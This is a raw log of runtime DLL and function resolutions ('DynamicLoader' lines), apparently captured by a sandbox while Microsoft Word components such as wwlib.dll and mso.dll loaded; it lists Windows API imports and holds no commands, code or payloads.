DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: urlmon.dll/
DynamicLoader: urlmon.dll/
DynamicLoader: urlmon.dll/
DynamicLoader: USER32.dll/UnregisterClassW
DynamicLoader: RPCRT4.dll/RpcEpUnregister
DynamicLoader: RPCRT4.dll/RpcBindingVectorFree
DynamicLoader: RPCRT4.dll/RpcServerUnregisterIf
DynamicLoader: IEShims.dll/IEShims_Uninitialize
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: ntdll.dll/LdrUnregisterDllNotification
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/DPA_Create
DynamicLoader: comctl32.dll/DPA_InsertPtr
DynamicLoader: comctl32.dll/DPA_DeletePtr
DynamicLoader: comctl32.dll/DPA_Search
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: kernel32.dll/QueryActCtxW
DynamicLoader: kernel32.dll/GetModuleHandleExW
DynamicLoader: kernel32.dll/CreateActCtxW
DynamicLoader: kernel32.dll/ActivateActCtx
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/DeactivateActCtx
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: wwlib.dll/FMain
DynamicLoader: wwlib.dll/wdCommandDispatch
DynamicLoader: wwlib.dll/wdGetApplicationObject
DynamicLoader: kernel32.dll/GetNativeSystemInfo
DynamicLoader: apphelp.dll/ApphelpCheckRunAppEx
DynamicLoader: apphelp.dll/ApphelpQueryModuleDataEx
DynamicLoader: apphelp.dll/ApphelpParseModuleData
DynamicLoader: apphelp.dll/ApphelpCreateAppcompatData
DynamicLoader: apphelp.dll/SdbInitDatabaseEx
DynamicLoader: apphelp.dll/SdbReleaseDatabase
DynamicLoader: apphelp.dll/SdbUnpackAppCompatData
DynamicLoader: apphelp.dll/SdbQueryContext
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: ADVAPI32.dll/EventWrite
DynamicLoader: ADVAPI32.dll/EventRegister
DynamicLoader: ADVAPI32.dll/EventUnregister
DynamicLoader: kernel32.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: kernel32.dll/GetTickCount64
DynamicLoader: kernel32.dll/InitializeSListHead
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: ADVAPI32.dll/EventWrite
DynamicLoader: ADVAPI32.dll/EventRegister
DynamicLoader: ADVAPI32.dll/EventUnregister
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/QueryActCtxW
DynamicLoader: kernel32.dll/ActivateActCtx
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/DeactivateActCtx
DynamicLoader: kernel32.dll/GetLongPathNameA
DynamicLoader: kernel32.dll/GetLongPathNameW
DynamicLoader: kernel32.dll/ProcessIdToSessionId
DynamicLoader: kernel32.dll/GlobalMemoryStatusEx
DynamicLoader: kernel32.dll/QueueUserWorkItem
DynamicLoader: kernel32.dll/GetUserDefaultUILanguage
DynamicLoader: kernel32.dll/RegisterApplicationRecoveryCallback
DynamicLoader: kernel32.dll/ApplicationRecoveryInProgress
DynamicLoader: kernel32.dll/ApplicationRecoveryFinished
DynamicLoader: kernel32.dll/RegisterApplicationRestart
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/WerRegisterFile
DynamicLoader: kernel32.dll/CreateMemoryResourceNotification
DynamicLoader: kernel32.dll/QueryMemoryResourceNotification
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/QueryThreadCycleTime
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/SetProcessDEPPolicy
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/GetLocaleInfoEx
DynamicLoader: kernel32.dll/GetCalendarInfoEx
DynamicLoader: kernel32.dll/LocaleNameToLCID
DynamicLoader: kernel32.dll/EnumSystemLocalesEx
DynamicLoader: kernel32.dll/EnumCalendarInfoExEx
DynamicLoader: kernel32.dll/EnumDateFormatsExEx
DynamicLoader: kernel32.dll/EnumTimeFormatsEx
DynamicLoader: kernel32.dll/GetThreadUILanguage
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: IMM32.DLL/ImmDisableIME
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/GetNativeSystemInfo
DynamicLoader: kernel32.dll/GetSystemWow64DirectoryW
DynamicLoader: ADVAPI32.dll/CheckTokenMembership
DynamicLoader: kernel32.dll/GetSystemWow64DirectoryW
DynamicLoader: kernel32.dll/GetFileAttributesExW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: USER32.dll/MonitorFromWindow
DynamicLoader: USER32.dll/MonitorFromRect
DynamicLoader: USER32.dll/MonitorFromPoint
DynamicLoader: USER32.dll/EnumDisplayMonitors
DynamicLoader: USER32.dll/GetMonitorInfoA
DynamicLoader: USER32.dll/EnumDisplayDevicesA
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: UxTheme.DLL/IsThemeActive
DynamicLoader: UxTheme.DLL/OpenThemeData
DynamicLoader: UxTheme.DLL/CloseThemeData
DynamicLoader: UxTheme.DLL/DrawThemeBackground
DynamicLoader: UxTheme.DLL/DrawThemeEdge
DynamicLoader: UxTheme.DLL/DrawThemeText
DynamicLoader: UxTheme.DLL/GetThemeBackgroundContentRect
DynamicLoader: UxTheme.DLL/GetThemeBackgroundExtent
DynamicLoader: UxTheme.DLL/GetThemePartSize
DynamicLoader: UxTheme.DLL/GetThemeTextExtent
DynamicLoader: UxTheme.DLL/GetThemeTextMetrics
DynamicLoader: UxTheme.DLL/GetThemeBackgroundRegion
DynamicLoader: UxTheme.DLL/HitTestThemeBackground
DynamicLoader: UxTheme.DLL/DrawThemeIcon
DynamicLoader: UxTheme.DLL/IsThemePartDefined
DynamicLoader: UxTheme.DLL/IsThemeBackgroundPartiallyTransparent
DynamicLoader: UxTheme.DLL/GetThemeColor
DynamicLoader: UxTheme.DLL/GetThemeMetric
DynamicLoader: UxTheme.DLL/GetThemeString
DynamicLoader: UxTheme.DLL/GetThemeBool
DynamicLoader: UxTheme.DLL/GetThemeInt
DynamicLoader: UxTheme.DLL/GetThemeEnumValue
DynamicLoader: UxTheme.DLL/GetThemePosition
DynamicLoader: UxTheme.DLL/GetThemeFont
DynamicLoader: UxTheme.DLL/GetThemeRect
DynamicLoader: UxTheme.DLL/GetThemeMargins
DynamicLoader: UxTheme.DLL/GetThemeIntList
DynamicLoader: UxTheme.DLL/GetThemePropertyOrigin
DynamicLoader: UxTheme.DLL/SetWindowTheme
DynamicLoader: UxTheme.DLL/GetThemeFilename
DynamicLoader: UxTheme.DLL/GetThemeSysColor
DynamicLoader: UxTheme.DLL/GetThemeSysColorBrush
DynamicLoader: UxTheme.DLL/GetThemeSysSize
DynamicLoader: UxTheme.DLL/GetThemeSysBool
DynamicLoader: UxTheme.DLL/GetThemeSysFont
DynamicLoader: UxTheme.DLL/GetThemeSysInt
DynamicLoader: UxTheme.DLL/GetThemeSysString
DynamicLoader: UxTheme.DLL/IsAppThemed
DynamicLoader: UxTheme.DLL/GetWindowTheme
DynamicLoader: UxTheme.DLL/GetThemeAppProperties
DynamicLoader: UxTheme.DLL/SetThemeAppProperties
DynamicLoader: UxTheme.DLL/GetThemeDocumentationProperty
DynamicLoader: UxTheme.DLL/EnableThemeDialogTexture
DynamicLoader: UxTheme.DLL/GetCurrentThemeName
DynamicLoader: UxTheme.DLL/EnableTheming
DynamicLoader: UxTheme.DLL/DrawThemeParentBackground
DynamicLoader: UxTheme.DLL/DrawThemeTextEx
DynamicLoader: UxTheme.DLL/BeginPanningFeedback
DynamicLoader: UxTheme.DLL/UpdatePanningFeedback
DynamicLoader: UxTheme.DLL/EndPanningFeedback
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/QueryActCtxW
DynamicLoader: kernel32.dll/ActivateActCtx
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/DeactivateActCtx
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: riched20.dll/REMSOHInst
DynamicLoader: riched20.dll/REExtendedRegisterClass
DynamicLoader: kernel32.dll/SwitchToThread
DynamicLoader: kernel32.dll/TryEnterCriticalSection
DynamicLoader: kernel32.dll/SetCriticalSectionSpinCount
DynamicLoader: USER32.dll/ChangeWindowMessageFilter
DynamicLoader: USER32.dll/AddClipboardFormatListener
DynamicLoader: USER32.dll/RemoveClipboardFormatListener
DynamicLoader: USER32.dll/GetUpdatedClipboardFormats
DynamicLoader: mscoree.dll/GetRequestedRuntimeInfo
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: mscoree.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: mscoreei.dll/RegisterShimImplCallback
DynamicLoader: mscoreei.dll/RegisterShimImplCleanupCallback
DynamicLoader: mscoreei.dll/SetShellShimInstance
DynamicLoader: mscoreei.dll/OnShimDllMainCalled
DynamicLoader: mscoreei.dll/GetRequestedRuntimeInfo_RetAddr
DynamicLoader: mscoreei.dll/GetRequestedRuntimeInfo
DynamicLoader: SHLWAPI.dll/UrlIsW
DynamicLoader: kernel32.dll/GetCurrentPackageId
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: mscoree.dll/LockClrVersion
DynamicLoader: mscoree.dll/CLRCreateInstance
DynamicLoader: mscoreei.dll/LockClrVersion_RetAddr
DynamicLoader: mscoreei.dll/LockClrVersion
DynamicLoader: mscoreei.dll/CLRCreateInstance
DynamicLoader: ole32.dll/OleLoadFromStream
DynamicLoader: OLEAUT32.dll/SysAllocStringByteLen
DynamicLoader: OLEAUT32.dll/SysFreeString
DynamicLoader: OLEAUT32.dll/VariantChangeType
DynamicLoader: OLEAUT32.dll/VariantClear
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: OSPPC.DLL/SLClose
DynamicLoader: OSPPC.DLL/SLConsumeRight
DynamicLoader: OSPPC.DLL/SLGetPKeyId
DynamicLoader: OSPPC.DLL/SLGetPolicyInformation
DynamicLoader: OSPPC.DLL/SLGetApplicationPolicy
DynamicLoader: OSPPC.DLL/SLGetLicensingStatusInformation
DynamicLoader: OSPPC.DLL/SLLoadApplicationPolicies
DynamicLoader: OSPPC.DLL/SLOpen
DynamicLoader: OSPPC.DLL/SLPersistApplicationPolicies
DynamicLoader: OSPPC.DLL/SLUnloadApplicationPolicies
DynamicLoader: OSPPC.DLL/SLGetProductSkuInformation
DynamicLoader: OSPPC.DLL/SLInstallProofOfPurchase
DynamicLoader: OSPPC.DLL/SLInstallLicense
DynamicLoader: OSPPC.DLL/SLRegisterPlugin
DynamicLoader: OSPPC.DLL/SLUninstallProofOfPurchase
DynamicLoader: OSPPC.DLL/SLGetPKeyInformation
DynamicLoader: OSPPC.DLL/SLGetSLIDList
DynamicLoader: OSPPC.DLL/SLGenerateOfflineInstallationId
DynamicLoader: OSPPC.DLL/SLDepositOfflineConfirmationId
DynamicLoader: OSPPC.DLL/SLPersistRTSPayloadOverride
DynamicLoader: OSPPC.DLL/SLSetAuthenticationData
DynamicLoader: OSPPC.DLL/SLGetAuthenticationResult
DynamicLoader: OSPPC.DLL/SLGetServiceInformation
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: Comctl32.dll/SetWindowSubclass
DynamicLoader: Comctl32.dll/DefSubclassProc
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: ADVAPI32.dll/EventWrite
DynamicLoader: ADVAPI32.dll/EventRegister
DynamicLoader: ADVAPI32.dll/EventUnregister
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: ADVAPI32.dll/EventWrite
DynamicLoader: ADVAPI32.dll/EventRegister
DynamicLoader: ADVAPI32.dll/EventUnregister
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: Winspool.DRV/GetPrinterW
DynamicLoader: Winspool.DRV/GetPrinterA
DynamicLoader: Winspool.DRV/DeviceCapabilitiesW
DynamicLoader: Winspool.DRV/DeviceCapabilitiesA
DynamicLoader: Winspool.DRV/OpenPrinterW
DynamicLoader: Winspool.DRV/OpenPrinterA
DynamicLoader: Winspool.DRV/DocumentPropertiesW
DynamicLoader: Winspool.DRV/DocumentPropertiesA
DynamicLoader: Winspool.DRV/EnumPrintersA
DynamicLoader: Winspool.DRV/EnumJobsA
DynamicLoader: Winspool.DRV/GetPrinterDriverA
DynamicLoader: Winspool.DRV/ClosePrinter
DynamicLoader: Winspool.DRV/EnumPrintersW
DynamicLoader: Winspool.DRV/EnumJobsW
DynamicLoader: Winspool.DRV/GetPrinterDriverW
DynamicLoader: Winspool.DRV/AddPrinterDriverA
DynamicLoader: Winspool.DRV/AddPrinterDriverW
DynamicLoader: Winspool.DRV/GetPrinterDriverDirectoryA
DynamicLoader: Winspool.DRV/GetPrinterDriverDirectoryW
DynamicLoader: Winspool.DRV/DeletePrinter
DynamicLoader: Winspool.DRV/AddPrinterA
DynamicLoader: Winspool.DRV/AddPrinterW
DynamicLoader: Winspool.DRV/AddPrinterConnectionW
DynamicLoader: Winspool.DRV/GetDefaultPrinterW
DynamicLoader: Winspool.DRV/StartDocPrinterW
DynamicLoader: Winspool.DRV/EndDocPrinter
DynamicLoader: Winspool.DRV/StartPagePrinter
DynamicLoader: Winspool.DRV/EndPagePrinter
DynamicLoader: Winspool.DRV/WritePrinter
DynamicLoader: Winspool.DRV/IsValidDevmodeW
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: SHELL32.DLL/SHGetDesktopFolder
DynamicLoader: SHELL32.DLL/SHGetMalloc
DynamicLoader: SHELL32.DLL/SHGetPathFromIDList
DynamicLoader: SHELL32.DLL/SHGetPathFromIDListW
DynamicLoader: SHELL32.DLL/SHGetDataFromIDListA
DynamicLoader: SHELL32.DLL/SHGetDataFromIDListW
DynamicLoader: SHELL32.DLL/SHBrowseForFolderA
DynamicLoader: SHELL32.DLL/SHBrowseForFolderW
DynamicLoader: SHELL32.DLL/SHGetSpecialFolderLocation
DynamicLoader: SHELL32.DLL/SHGetFileInfoA
DynamicLoader: SHELL32.DLL/SHGetFileInfoW
DynamicLoader: SHELL32.DLL/ExtractIconExA
DynamicLoader: SHELL32.DLL/ExtractIconW
DynamicLoader: SHELL32.DLL/DllGetClassObject
DynamicLoader: SHELL32.DLL/DragQueryPoint
DynamicLoader: SHELL32.DLL/DragQueryFileA
DynamicLoader: SHELL32.DLL/DragQueryFileW
DynamicLoader: SHELL32.DLL/DragFinish
DynamicLoader: SHELL32.DLL/DragAcceptFiles
DynamicLoader: SHELL32.DLL/ExtractIconA
DynamicLoader: SHELL32.DLL/ShellExecuteA
DynamicLoader: SHELL32.DLL/ShellExecuteW
DynamicLoader: SHELL32.DLL/ShellExecuteExA
DynamicLoader: SHELL32.DLL/ShellExecuteExW
DynamicLoader: SHELL32.DLL/SHAppBarMessage
DynamicLoader: SHELL32.DLL/FindExecutableA
DynamicLoader: SHELL32.DLL/FindExecutableW
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/SHGetSpecialFolderPathA
DynamicLoader: SHELL32.DLL/SHGetSpecialFolderPathW
DynamicLoader: SHELL32.DLL/SHChangeNotify
DynamicLoader: SHELL32.DLL/SHAddToRecentDocs
DynamicLoader: SHELL32.DLL/SHFileOperationA
DynamicLoader: SHELL32.DLL/SHFileOperationW
DynamicLoader: SHELL32.DLL/ExtractIconExW
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/Shell_NotifyIconA
DynamicLoader: SHELL32.DLL/Shell_NotifyIconW
DynamicLoader: SHELL32.DLL/SHCreateItemFromParsingName
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/SHCreateItemFromIDList
DynamicLoader: SHELL32.DLL/SHGetKnownFolderIDList
DynamicLoader: SHELL32.DLL/SHBindToParent
DynamicLoader: SHELL32.DLL/SHGetFolderPathW
DynamicLoader: SHELL32.DLL/SHSetTemporaryPropertyForItem
DynamicLoader: SHELL32.DLL/SHRestricted
DynamicLoader: SHELL32.DLL/SHCreateShellItemArrayFromIDLists
DynamicLoader: SHELL32.DLL/SHGetFolderLocation
DynamicLoader: SHELL32.DLL/SHParseDisplayName
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/SwitchToThread
DynamicLoader: kernel32.dll/TryEnterCriticalSection
DynamicLoader: kernel32.dll/SetCriticalSectionSpinCount
DynamicLoader: IMM32.DLL/ImmDisableIME
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: USER32.dll/RegisterPowerSettingNotification
DynamicLoader: POWRPROF.DLL/PowerSettingRegisterNotification
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: USER32.dll/GetWindowTextW
DynamicLoader: POWRPROF.DLL/PowerSettingRegisterNotification
DynamicLoader: POWRPROF.DLL/PowerSettingRegisterNotification
DynamicLoader: POWRPROF.DLL/PowerSettingRegisterNotification
DynamicLoader: POWRPROF.DLL/PowerSettingRegisterNotification
DynamicLoader: POWRPROF.DLL/PowerSettingRegisterNotification
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: IMM32.DLL/ImmAssociateContext
DynamicLoader: IMM32.DLL/ImmConfigureIMEA
DynamicLoader: IMM32.DLL/ImmCreateContext
DynamicLoader: IMM32.DLL/ImmDestroyContext
DynamicLoader: IMM32.DLL/ImmEscapeA
DynamicLoader: IMM32.DLL/ImmGetCandidateWindow
DynamicLoader: IMM32.DLL/ImmGetCompositionFontA
DynamicLoader: IMM32.DLL/ImmGetCompositionStringA
DynamicLoader: IMM32.DLL/ImmGetCompositionWindow
DynamicLoader: IMM32.DLL/ImmGetContext
DynamicLoader: IMM32.DLL/ImmGetConversionStatus
DynamicLoader: IMM32.DLL/ImmGetDefaultIMEWnd
DynamicLoader: IMM32.DLL/ImmGetDescriptionA
DynamicLoader: IMM32.DLL/ImmGetIMEFileNameA
DynamicLoader: IMM32.DLL/ImmGetOpenStatus
DynamicLoader: IMM32.DLL/ImmGetProperty
DynamicLoader: IMM32.DLL/ImmGetVirtualKey
DynamicLoader: IMM32.DLL/ImmIsIME
DynamicLoader: IMM32.DLL/ImmIsUIMessageA
DynamicLoader: IMM32.DLL/ImmNotifyIME
DynamicLoader: IMM32.DLL/ImmRegisterWordA
DynamicLoader: IMM32.DLL/ImmReleaseContext
DynamicLoader: IMM32.DLL/ImmSetCandidateWindow
DynamicLoader: IMM32.DLL/ImmSetCompositionFontA
DynamicLoader: IMM32.DLL/ImmSetCompositionStringA
DynamicLoader: IMM32.DLL/ImmSetCompositionWindow
DynamicLoader: IMM32.DLL/ImmSetConversionStatus
DynamicLoader: IMM32.DLL/ImmSetOpenStatus
DynamicLoader: IMM32.DLL/ImmSetStatusWindowPos
DynamicLoader: IMM32.DLL/ImmConfigureIMEW
DynamicLoader: IMM32.DLL/ImmEscapeW
DynamicLoader: IMM32.DLL/ImmGetCompositionFontW
DynamicLoader: IMM32.DLL/ImmGetCompositionStringW
DynamicLoader: IMM32.DLL/ImmGetDescriptionW
DynamicLoader: IMM32.DLL/ImmGetIMEFileNameW
DynamicLoader: IMM32.DLL/ImmIsUIMessageW
DynamicLoader: IMM32.DLL/ImmRegisterWordW
DynamicLoader: IMM32.DLL/ImmSetCompositionFontW
DynamicLoader: IMM32.DLL/ImmSetCompositionStringW
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeA
DynamicLoader: VERSION.dll/GetFileVersionInfoA
DynamicLoader: VERSION.dll/VerQueryValueA
DynamicLoader: ADVAPI32.dll/RegEnumKeyA
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: Comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/StringFromGUID2
DynamicLoader: ADVAPI32.dll/OpenThreadToken
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: Comctl32.dll/
DynamicLoader: Comctl32.dll/
DynamicLoader: Comctl32.dll/
DynamicLoader: Comctl32.dll/
DynamicLoader: Comctl32.dll/
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: Comctl32.dll/
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: Comctl32.dll/
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: Comctl32.dll/
DynamicLoader: Comctl32.dll/
DynamicLoader: SHELL32.DLL/
DynamicLoader: ole32.dll/CoTaskMemFree
